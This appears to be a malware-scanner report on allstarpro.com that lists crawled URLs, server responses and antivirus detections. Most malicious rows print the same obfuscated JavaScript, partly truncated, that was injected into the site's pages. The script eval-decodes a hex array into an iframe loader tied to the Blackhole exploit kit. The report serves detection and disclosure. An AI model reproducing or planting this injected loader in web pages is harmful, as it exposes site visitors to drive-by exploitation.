Request | Server response | Status |
http://allstarpro.net/ | HTTP/1.1 301 Found Connection: close Date: Tue, 24 Feb 2015 19:50:27 GMT Location: http://www.allstarpro.com Server: nginx/1.5.0 Content-Type: text/html X-Powered-By: PHP/5.4.29
| clean |
http://www.allstarpro.com/ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/././ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/././support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./././ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./././support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/././././ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/././././support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./././././ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./././././support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
